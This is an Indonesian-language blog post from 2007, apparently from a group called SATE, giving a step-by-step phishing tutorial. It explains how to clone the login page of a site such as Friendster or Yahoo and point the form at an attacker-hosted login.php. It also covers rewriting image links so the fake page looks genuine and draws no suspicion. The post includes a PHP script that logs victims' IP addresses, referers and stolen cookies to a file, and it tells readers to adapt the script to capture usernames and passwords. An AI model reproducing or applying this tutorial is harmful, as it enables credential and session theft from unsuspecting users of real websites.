Monday, March 19, 2007

Fage login sebuah Website

Setelah melihat sekian banyak orang kebingungan dengan yang namanya membuat fake login sebuah
website .. Gw kembali berpikir, apa ini bener bener susah??? Sebab kalau dibuat Tutorial, sebenernya
ini akan menjadi Tutorial paling pendek dalam sejarah SATE (Security Advisory TEam) selama ini ..
Ok ok ..
Mari sekarang kita mulai saja lgsg ..
Tutorial ini bisa diterapkan dalam bentuk page apa saja ..
Well ..
Pertama tama yang kalian perlukan adalah membuka login page dari sebuah website target anda ..
Misalnya friendster / Yahoo .. Tapi sebisa mgkn usahakan jangan membuka dari mainpage nya .. Tapi
bukalah dari page setelah anda gagal login sekali (Biasanya soalnya lebih kecil tampilannya) .. Atau
dari page setelah anda loggout .. (Biasanya cuman dikasih tempat login doank, sedikit gambar, sedikit
link .. Lagipula membantu menghilangkan kecurigaan karena mental ke halaman utama) ..
Tapi semua itu terserah kalian .. Hehehe ..
Imajinasi sendiri dan berpikir setahap diatas orang lain, dan sedemikian rupa membuat jebakan yang
bisa membuat orang percaya dan membukanya, adalah seni dari 'ngiseng ala SATE' itu sendiri ..
Pertama tama bukalah HTML code daripada web itu sendiri ..
Setiap login page (Terutama yang PHP), pasti memiliki php code yang bertujuan untuk melakukan
login data dari client dan di compare .. Biasanya namanya Login.php .. Nah .. Anda cuman perlu
membuat sebuah login.php baru dengan code modifikasi dari bawah ini:CODE
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
Modif-lah untuk melakukan logging username and password .. ^^
Atau cari saja di google .. Hehehe ..
Lalu ubahkan alamat login.php pada script asli .. Yang biasanya adalah LocalCODE
/Login.php/
Menjadi Remote ke website anda, misal:CODE
http://www.example.com/Login.php
Begitu juga dengan gambar2 dan link2 ..
Biasanya mereka melakukan setting mencari file dari local address / directory, yang kebanyakan format
codenya adalah, sbb:CODE
/images/.jpg
Ubahlah menjadi alamat lengkap web itu ..
Misalnya Friendster.comCODE
http://www.friendster.com/images/.jpg
Tidak sulit bukan??
Lalu simpanlah dalam *.html baru anda ..
Dan host kan di hosting anda ..
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)